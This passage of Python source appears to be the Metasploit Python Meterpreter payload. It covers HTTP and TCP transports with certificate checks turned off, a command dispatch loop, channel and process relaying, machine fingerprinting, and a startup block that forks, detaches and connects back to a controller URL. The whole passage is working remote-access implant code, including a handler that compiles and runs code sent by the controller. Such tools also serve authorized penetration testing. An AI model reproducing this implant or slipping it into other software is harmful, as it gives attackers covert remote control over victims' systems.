send_packet(self, pkt): pkt = struct.pack('>I', len(pkt) + 4) + pkt self.request_retire = False try: self._send_packet(self.encrypt_packet(pkt)) except: debug_traceback() return False self.communication_last = time.time() return True def tlv_pack_timeouts(self): response = tlv_pack(TLV_TYPE_TRANS_COMM_TIMEOUT, self.communication_timeout) response += tlv_pack(TLV_TYPE_TRANS_RETRY_TOTAL, self.retry_total) response += tlv_pack(TLV_TYPE_TRANS_RETRY_WAIT, self.retry_wait) return response def tlv_pack_transport_group(self): trans_group = tlv_pack(TLV_TYPE_TRANS_URL, self.url) trans_group += self.tlv_pack_timeouts() return trans_group class HttpTransport(Transport): def __init__(self, url, proxy=None, user_agent=None, http_host=None, http_referer=None, http_cookie=None): super(HttpTransport, self).__init__() opener_args = [] scheme = url.split(':', 1)[0] if scheme == 'https' and ((sys.version_info[0] == 2 and sys.version_info >= (2, 7, 9)) or sys.version_info >= (3, 4, 3)): import ssl ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23) ssl_ctx.check_hostname = False ssl_ctx.verify_mode = ssl.CERT_NONE opener_args.append(urllib.HTTPSHandler(0, ssl_ctx)) if proxy: opener_args.append(urllib.ProxyHandler({scheme: proxy})) opener_args.append(urllib.ProxyBasicAuthHandler()) self.proxy = proxy opener = urllib.build_opener(*opener_args) opener.addheaders = [] if user_agent: opener.addheaders.append(('User-Agent', user_agent)) if http_cookie: opener.addheaders.append(('Cookie', http_cookie)) if http_referer: opener.addheaders.append(('Referer', http_referer)) self.user_agent = user_agent urllib.install_opener(opener) self.url = url self._http_request_headers = {'Content-Type': 'application/octet-stream'} if http_host: self._http_request_headers['Host'] = http_host self._first_packet = None self._empty_cnt = 0 def _get_packet(self): if self._first_packet: packet = self._first_packet self._first_packet = None return packet packet = None xor_key = None url_h = None request = urllib.Request(self.url, None, self._http_request_headers) urlopen_kwargs = {} if sys.version_info > (2, 6): urlopen_kwargs['timeout'] = self.communication_timeout try: url_h = urllib.urlopen(request, **urlopen_kwargs) if url_h.code == 200: packet = url_h.read() if len(packet) < PACKET_HEADER_SIZE: packet = None # looks corrupt else: xor_key = struct.unpack('BBBB', packet[:PACKET_XOR_KEY_SIZE]) header = xor_bytes(xor_key, packet[:PACKET_HEADER_SIZE]) pkt_length = struct.unpack('>I', header[PACKET_LENGTH_OFF:PACKET_LENGTH_OFF + PACKET_LENGTH_SIZE])[0] - 8 if len(packet) != (pkt_length + PACKET_HEADER_SIZE): packet = None # looks corrupt except: debug_traceback('[-] failure to receive packet from ' + self.url) if not packet: if url_h and url_h.code == 200: # server has nothing for us but this is fine so update the communication time and wait self.communication_last = time.time() delay = 100 * self._empty_cnt self._empty_cnt += 1 time.sleep(float(min(10000, delay)) / 1000) return packet self._empty_cnt = 0 return packet def _send_packet(self, packet): request = urllib.Request(self.url, packet, self._http_request_headers) urlopen_kwargs = {} if sys.version_info > (2, 6): urlopen_kwargs['timeout'] = self.communication_timeout url_h = urllib.urlopen(request, **urlopen_kwargs) response = url_h.read() def patch_uri_path(self, new_path): match = re.match(r'https?://[^/]+(/.*$)', self.url) if match is None: return False self.url = self.url[:match.span(1)[0]] + new_path return True def tlv_pack_transport_group(self): trans_group = super(HttpTransport, self).tlv_pack_transport_group() if self.user_agent: trans_group += tlv_pack(TLV_TYPE_TRANS_UA, self.user_agent) if self.proxy: trans_group += tlv_pack(TLV_TYPE_TRANS_PROXY_HOST, self.proxy) return trans_group class TcpTransport(Transport): def __init__(self, url, socket=None): super(TcpTransport, self).__init__() self.url = url self.socket = socket self._cleanup_thread = None self._first_packet = True def _sock_cleanup(self, sock): remaining_time = self.communication_timeout while remaining_time > 0: iter_start_time = time.time() if select.select([sock], [], [], remaining_time)[0]: if len(sock.recv(4096)) == 0: break remaining_time -= time.time() - iter_start_time sock.close() def _activate(self): address, port = self.url[6:].rsplit(':', 1) port = int(port.rstrip('/')) timeout = max(self.communication_timeout, 30) if address in ('', '', '::'): try: server_sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) server_sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0) except (AttributeError, socket.error): server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_sock.bind(('', port)) server_sock.listen(1) if not select.select([server_sock], [], [], timeout)[0]: server_sock.close() return False sock, _ = server_sock.accept() server_sock.close() else: if ':' in address: sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) else: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(timeout) sock.connect((address, port)) sock.settimeout(None) self.socket = sock self._first_packet = True return True def _deactivate(self): cleanup = threading.Thread(target=self._sock_cleanup, args=(self.socket,)) cleanup.run() self.socket = None def _get_packet(self): first = self._first_packet self._first_packet = False if not select.select([self.socket], [], [], 0.5)[0]: return bytes() packet = self.socket.recv(PACKET_HEADER_SIZE) if packet == '': # remote is closed self.request_retire = True return None if len(packet) != PACKET_HEADER_SIZE: if first and len(packet) == 4: received = 0 header = packet[:4] pkt_length = struct.unpack('>I', header)[0] self.socket.settimeout(max(self.communication_timeout, 30)) while received < pkt_length: received += len(self.socket.recv(pkt_length - received)) self.socket.settimeout(None) return self._get_packet() return None xor_key = struct.unpack('BBBB', packet[:PACKET_XOR_KEY_SIZE]) # XOR the whole header first header = xor_bytes(xor_key, packet[:PACKET_HEADER_SIZE]) # Extract just the length pkt_length = struct.unpack('>I', header[PACKET_LENGTH_OFF:PACKET_LENGTH_OFF+PACKET_LENGTH_SIZE])[0] pkt_length -= 8 # Read the rest of the packet rest = bytes() while len(rest) < pkt_length: rest += self.socket.recv(pkt_length - len(rest)) # return the whole packet, as it's decoded separately return packet + rest def _send_packet(self, packet): self.socket.send(packet) @classmethod def from_socket(cls, sock): url = 'tcp://' address, port = sock.getsockname()[:2] # this will need to be changed if the bind stager ever supports binding to a specific address if not address in ('', '', '::'): address, port = sock.getpeername()[:2] url += address + ':' + str(port) return cls(url, sock) class PythonMeterpreter(object): def __init__(self, transport): self.transport = transport self._transport_sleep = None self.running = False self.last_registered_extension = None self.extension_functions = {} self.channels = {} self.next_channel_id = 1 self.interact_channels = [] self.processes = {} self.next_process_id = 1 self.transports = [self.transport] self.session_expiry_time = SESSION_EXPIRATION_TIMEOUT self.session_expiry_end = time.time() + self.session_expiry_time for func in list(filter(lambda x: x.startswith('_core'), dir(self))): self.extension_functions[func[1:]] = getattr(self, func) self.running = True def register_extension(self, extension_name): self.last_registered_extension = extension_name return self.last_registered_extension def register_function(self, func): self.extension_functions[func.__name__] = func return func def register_function_if(self, condition): if condition: return self.register_function else: return lambda function: function def register_function_windll(self, func): if has_windll: self.register_function(func) return func def add_channel(self, channel): if not isinstance(channel, MeterpreterChannel): debug_print('[-] channel object is not an instance of MeterpreterChannel') raise TypeError('invalid channel object') idx = self.next_channel_id self.channels[idx] = channel debug_print('[*] added channel id: ' + str(idx) + ' type: ' + channel.__class__.__name__) self.next_channel_id += 1 return idx def close_channel(self, channel_id): if channel_id not in self.channels: return False channel = self.channels[channel_id] try: channel.close() except Exception: debug_traceback('[-] failed to close channel id: ' + str(channel_id)) return False del self.channels[channel_id] if channel_id in self.interact_channels: self.interact_channels.remove(channel_id) debug_print('[*] closed and removed channel id: ' + str(channel_id)) return True def add_process(self, process): if has_windll: PROCESS_ALL_ACCESS = 0x1fffff OpenProcess = ctypes.windll.kernel32.OpenProcess OpenProcess.argtypes = [ctypes.c_ulong, ctypes.c_long, ctypes.c_ulong] OpenProcess.restype = ctypes.c_void_p handle = OpenProcess(PROCESS_ALL_ACCESS, False, process.pid) else: handle = self.next_process_id self.next_process_id += 1 self.processes[handle] = process debug_print('[*] added process id: ' + str(process.pid) + ', handle: ' + str(handle)) return handle def close_process(self, proc_h_id): if proc_h_id not in self.processes: return False proc_h = self.processes.pop(proc_h_id) if proc_h: # proc_h is only set when we started the process via execute and not when we attached to it for channel_id, channel in self.channels.items(): if not isinstance(channel, MeterpreterProcess): continue if not channel.proc_h is proc_h: continue self.close_channel(channel_id) break if has_windll: CloseHandle = ctypes.windll.kernel32.CloseHandle CloseHandle.argtypes = [ctypes.c_void_p] CloseHandle.restype = ctypes.c_long CloseHandle(proc_h_id) debug_print('[*] closed and removed process handle: ' + str(proc_h_id)) return True def get_packet(self): pkt = self.transport.get_packet() if pkt is None and self.transport.should_retire: self.transport_change() return pkt def send_packet(self, packet): send_succeeded = self.transport.send_packet(packet) if not send_succeeded and self.transport.should_retire: self.transport_change() return send_succeeded @property def session_has_expired(self): if self.session_expiry_time == 0: return False return time.time() > self.session_expiry_end def transport_add(self, new_transport): new_position = self.transports.index(self.transport) self.transports.insert(new_position, new_transport) def transport_change(self, new_transport=None): if new_transport is None: new_transport = self.transport_next() self.transport.deactivate() debug_print('[*] changing transport to: ' + new_transport.url) while not new_transport.activate(): new_transport = self.transport_next(new_transport) debug_print('[*] changing transport to: ' + new_transport.url) self.transport = new_transport def transport_next(self, current_transport=None): if current_transport is None: current_transport = self.transport new_idx = self.transports.index(current_transport) + 1 if new_idx == len(self.transports): new_idx = 0 return self.transports[new_idx] def transport_prev(self, current_transport=None): if current_transport is None: current_transport = self.transport new_idx = self.transports.index(current_transport) - 1 if new_idx == -1: new_idx = len(self.transports) - 1 return self.transports[new_idx] def run(self): while self.running and not self.session_has_expired: request = self.get_packet() if request: response = self.create_response(request) if response: self.send_packet(response) if self._transport_sleep: self.transport.deactivate() time.sleep(self._transport_sleep) self._transport_sleep = None if not self.transport.activate(): self.transport_change() continue # iterate over the keys because self.channels could be modified if one is closed channel_ids = list(self.channels.keys()) for channel_id in channel_ids: channel = self.channels[channel_id] data = bytes() write_request_parts = [] close_channel = False if isinstance(channel, MeterpreterProcess): if channel_id in self.interact_channels: proc_h = channel.proc_h if proc_h.stderr_reader.is_read_ready(): data += proc_h.stderr_reader.read() if proc_h.stdout_reader.is_read_ready(): data += proc_h.stdout_reader.read() # Defer closing the channel until the data has been sent if not channel.is_alive(): close_channel = True elif isinstance(channel, MeterpreterSocketTCPClient): while select.select([channel.fileno()], [], [], 0)[0]: try: d = channel.read(1) except socket.error: d = bytes() if len(d) == 0: self.handle_dead_resource_channel(channel_id) break data += d elif isinstance(channel, MeterpreterSocketTCPServer): if select.select([channel.fileno()], [], [], 0)[0]: (client_sock, client_addr) = channel.sock.accept() server_addr = channel.sock.getsockname() client_channel_id = self.add_channel(MeterpreterSocketTCPClient(client_sock)) self.send_packet(tlv_pack_request('stdapi_net_tcp_channel_open', [ {'type': TLV_TYPE_CHANNEL_ID, 'value': client_channel_id}, {'type': TLV_TYPE_CHANNEL_PARENTID, 'value': channel_id}, {'type': TLV_TYPE_LOCAL_HOST, 'value': server_addr[0]}, {'type': TLV_TYPE_LOCAL_PORT, 'value': server_addr[1]}, {'type': TLV_TYPE_PEER_HOST, 'value': client_addr[0]}, {'type': TLV_TYPE_PEER_PORT, 'value': client_addr[1]}, ])) elif isinstance(channel, MeterpreterSocketUDPClient): if select.select([channel.fileno()], [], [], 0)[0]: try: data, peer_address = channel.sock.recvfrom(65535) except socket.error: self.handle_dead_resource_channel(channel_id) else: write_request_parts.extend([ {'type': TLV_TYPE_PEER_HOST, 'value': peer_address[0]}, {'type': TLV_TYPE_PEER_PORT, 'value': peer_address[1]}, ]) if data: write_request_parts.extend([ {'type': TLV_TYPE_CHANNEL_ID, 'value': channel_id}, {'type': TLV_TYPE_CHANNEL_DATA, 'value': data}, {'type': TLV_TYPE_LENGTH, 'value': len(data)}, ]) self.send_packet(tlv_pack_request('core_channel_write', write_request_parts)) if close_channel: channel.close() self.handle_dead_resource_channel(channel_id) def handle_dead_resource_channel(self, channel_id): if channel_id in self.interact_channels: self.interact_channels.remove(channel_id) if channel_id in self.channels: del self.channels[channel_id] self.send_packet(tlv_pack_request('core_channel_close', [ {'type': TLV_TYPE_CHANNEL_ID, 'value': channel_id}, ])) def _core_set_uuid(self, request, response): new_uuid = packet_get_tlv(request, TLV_TYPE_UUID) if new_uuid: PAYLOAD_UUID = binascii.b2a_hex(new_uuid['value']) return ERROR_SUCCESS, response def _core_enumextcmd(self, request, response): id_start = packet_get_tlv(request, TLV_TYPE_UINT)['value'] id_end = packet_get_tlv(request, TLV_TYPE_LENGTH)['value'] + id_start for func_name in self.extension_functions.keys(): command_id = cmd_string_to_id(func_name) if command_id is None: continue if id_start < command_id and command_id < id_end: response += tlv_pack(TLV_TYPE_UINT, command_id) return ERROR_SUCCESS, response def _core_get_session_guid(self, request, response): response += tlv_pack(TLV_TYPE_SESSION_GUID, binascii.a2b_hex(bytes(SESSION_GUID, 'UTF-8'))) return ERROR_SUCCESS, response def _core_set_session_guid(self, request, response): new_guid = packet_get_tlv(request, TLV_TYPE_SESSION_GUID) if new_guid: SESSION_GUID = binascii.b2a_hex(new_guid['value']) return ERROR_SUCCESS, response def _core_machine_id(self, request, response): serial = '' machine_name = platform.uname()[1] if has_windll: from ctypes import wintypes k32 = ctypes.windll.kernel32 sys_dir = ctypes.create_unicode_buffer(260) if not k32.GetSystemDirectoryW(ctypes.byref(sys_dir), 260): return ERROR_FAILURE_WINDOWS vol_buf = ctypes.create_unicode_buffer(260) fs_buf = ctypes.create_unicode_buffer(260) serial_num = wintypes.DWORD(0) if not k32.GetVolumeInformationW(ctypes.c_wchar_p(sys_dir.value[:3]), vol_buf, ctypes.sizeof(vol_buf), ctypes.byref(serial_num), None, None, fs_buf, ctypes.sizeof(fs_buf)): return ERROR_FAILURE_WINDOWS serial_num = serial_num.value serial = "%04x" % ((serial_num >> 16) & 0xffff) + '-' "%04x" % (serial_num & 0xffff) else: serial = get_hdd_label() response += tlv_pack(TLV_TYPE_MACHINE_ID, "%s:%s" % (serial, machine_name)) return ERROR_SUCCESS, response def _core_native_arch(self, request, response): response += tlv_pack(TLV_TYPE_STRING, get_native_arch()) return ERROR_SUCCESS, response def _core_patch_url(self, request, response): if not isinstance(self.transport, HttpTransport): return ERROR_FAILURE, response new_uri_path = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value'] if not self.transport.patch_uri_path(new_uri_path): return ERROR_FAILURE, response return ERROR_SUCCESS, response def _core_negotiate_tlv_encryption(self, request, response): debug_print('[*] Negotiating TLV encryption') self.transport.aes_key = rand_bytes(32) self.transport.aes_enabled = False response += tlv_pack(TLV_TYPE_SYM_KEY_TYPE, ENC_AES256) der = packet_get_tlv(request, TLV_TYPE_RSA_PUB_KEY)['value'].strip() debug_print('[*] RSA key: ' + str(binascii.b2a_hex(der))) debug_print('[*] AES key: ' + hex(met_rsa.b2i(self.transport.aes_key))) enc_key = met_rsa_encrypt(der, self.transport.aes_key) debug_print('[*] Encrypted AES key: ' + hex(met_rsa.b2i(enc_key))) response += tlv_pack(TLV_TYPE_ENC_SYM_KEY, enc_key) debug_print('[*] TLV encryption sorted') return ERROR_SUCCESS, response def _core_loadlib(self, request, response): data_tlv = packet_get_tlv(request, TLV_TYPE_DATA) if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED: return ERROR_FAILURE, response libname = '???' match = re.search(r'^meterpreter\.register_extension\(\'([a-zA-Z0-9]+)\'\)$', str(data_tlv['value']), re.MULTILINE) if match is not None: libname = match.group(1) self.last_registered_extension = None symbols_for_extensions = {'meterpreter': self} symbols_for_extensions.update(EXPORTED_SYMBOLS) i = code.InteractiveInterpreter(symbols_for_extensions) i.runcode(compile(data_tlv['value'], 'ext_server_' + libname + '.py', 'exec')) extension_name = self.last_registered_extension if extension_name: check_extension = lambda x: x.startswith(extension_name) lib_methods = list(filter(check_extension, list(self.extension_functions.keys()))) for method in lib_methods: response += tlv_pack(TLV_TYPE_UINT, cmd_string_to_id(method)) return ERROR_SUCCESS, response def _core_shutdown(self, request, response): response += tlv_pack(TLV_TYPE_BOOL, True) self.running = False return ERROR_SUCCESS, response def _core_transport_add(self, request, response): new_transport = Transport.from_request(request) self.transport_add(new_transport) return ERROR_SUCCESS, response def _core_transport_change(self, request, response): new_transport = Transport.from_request(request) self.transport_add(new_transport) self.send_packet(response + tlv_pack(TLV_TYPE_RESULT, ERROR_SUCCESS)) self.transport_change(new_transport) return None def _core_transport_list(self, request, response): if self.session_expiry_time > 0: response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time()) response += tlv_pack(TLV_TYPE_TRANS_GROUP, self.transport.tlv_pack_transport_group()) transport = self.transport_next() while transport != self.transport: response += tlv_pack(TLV_TYPE_TRANS_GROUP, transport.tlv_pack_transport_group()) transport = self.transport_next(transport) return ERROR_SUCCESS, response def _core_transport_next(self, request, response): new_transport = self.transport_next() if new_transport == self.transport: return ERROR_FAILURE, response self.send_packet(response + tlv_pack(TLV_TYPE_RESULT, ERROR_SUCCESS)) self.transport_change(new_transport) return None def _core_transport_prev(self, request, response): new_transport = self.transport_prev() if new_transport == self.transport: return ERROR_FAILURE, response self.send_packet(response + tlv_pack(TLV_TYPE_RESULT, ERROR_SUCCESS)) self.transport_change(new_transport) return None def _core_transport_remove(self, request, response): url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value'] if self.transport.url == url: return ERROR_FAILURE, response transport_found = False for transport in self.transports: if transport.url == url: transport_found = True break if transport_found: self.transports.remove(transport) return ERROR_SUCCESS, response return ERROR_FAILURE, response def _core_transport_set_timeouts(self, request, response): timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_SESSION_EXP).get('value') if not timeout_value is None: self.session_expiry_time = timeout_value self.session_expiry_end = time.time() + self.session_expiry_time timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value') if timeout_value: self.transport.communication_timeout = timeout_value retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value') if retry_value: self.transport.retry_total = retry_value retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value') if retry_value: self.transport.retry_wait = retry_value if self.session_expiry_time > 0: response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time()) response += self.transport.tlv_pack_timeouts() return ERROR_SUCCESS, response def _core_transport_sleep(self, request, response): seconds = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT)['value'] self.send_packet(response + tlv_pack(TLV_TYPE_RESULT, ERROR_SUCCESS)) if seconds: self._transport_sleep = seconds return ERROR_SUCCESS, response def _core_channel_open(self, request, response): channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE) handler = 'channel_open_' + channel_type['value'] if handler not in self.extension_functions: debug_print('[-] core_channel_open missing handler: ' + handler) return error_result(NotImplementedError), response debug_print('[*] core_channel_open dispatching to handler: ' + handler) handler = self.extension_functions[handler] return handler(request, response) def _core_channel_close(self, request, response): channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value'] if not self.close_channel(channel_id): return ERROR_FAILURE, response return ERROR_SUCCESS, response def _core_channel_eof(self, request, response): channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value'] if channel_id not in self.channels: return ERROR_FAILURE, response channel = self.channels[channel_id] status, response = channel.core_eof(request, response) return status, response def _core_channel_interact(self, request, response): channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value'] if channel_id not in self.channels: return ERROR_FAILURE, response channel = self.channels[channel_id] toggle = packet_get_tlv(request, TLV_TYPE_BOOL)['value'] if toggle: if channel_id in self.interact_channels: self.interact_channels.remove(channel_id) else: self.interact_channels.append(channel_id) elif channel_id in self.interact_channels: self.interact_channels.remove(channel_id) return ERROR_SUCCESS, response def _core_channel_read(self, request, response): channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value'] if channel_id not in self.channels: return ERROR_FAILURE, response channel = self.channels[channel_id] status, response = channel.core_read(request, response) return status, response def _core_channel_write(self, request, response): channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value'] if channel_id not in self.channels: return ERROR_FAILURE, response channel = self.channels[channel_id] status = ERROR_FAILURE if channel.is_alive(): status, response = channel.core_write(request, response) return status, response def _core_channel_seek(self, request, response): channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value'] if channel_id not in self.channels: return ERROR_FAILURE, response channel = self.channels[channel_id] return channel.core_seek(request, response) def _core_channel_tell(self, request, response): channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value'] if channel_id not in self.channels: return ERROR_FAILURE, response channel = self.channels[channel_id] return channel.core_tell(request, response) def create_response(self, request): response = struct.pack('>I', PACKET_TYPE_RESPONSE) commd_id_tlv = packet_get_tlv(request, TLV_TYPE_COMMAND_ID) response += tlv_pack(commd_id_tlv) response += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(bytes(PAYLOAD_UUID, 'UTF-8'))) handler_name = cmd_id_to_string(commd_id_tlv['value']) if handler_name in self.extension_functions: handler = self.extension_functions[handler_name] try: debug_print('[*] running method ' + handler_name) result = handler(request, response) if result is None: debug_print("[-] handler result is none") return result, response = result except Exception: debug_traceback('[-] method ' + handler_name + ' resulted in an error') result = error_result() else: if result != ERROR_SUCCESS: debug_print('[-] method ' + handler_name + ' resulted in error: #' + str(result)) else: if handler_name is None: debug_print('[-] command id ' + str(commd_id_tlv['value']) + ' was requested but does not exist') else: debug_print('[-] method ' + handler_name + ' was requested but does not exist') result = error_result(NotImplementedError) reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID) if not reqid_tlv: debug_print("[-] no request ID found") return response += tlv_pack(reqid_tlv) debug_print("[*] sending response packet") return response + tlv_pack(TLV_TYPE_RESULT, result) # PATCH-SETUP-ENCRYPTION # _try_to_fork = TRY_TO_FORK and hasattr(os, 'fork') if not _try_to_fork or (_try_to_fork and os.fork() == 0): if hasattr(os, 'setsid'): try: os.setsid() except OSError: pass if HTTP_CONNECTION_URL and has_urllib: transport = HttpTransport(HTTP_CONNECTION_URL, proxy=HTTP_PROXY, user_agent=HTTP_USER_AGENT, http_host=HTTP_HOST, http_referer=HTTP_REFERER, http_cookie=HTTP_COOKIE) else: # PATCH-SETUP-STAGELESS-TCP-SOCKET # transport = TcpTransport.from_socket(s) met = PythonMeterpreter(transport) # PATCH-SETUP-TRANSPORTS # met.run()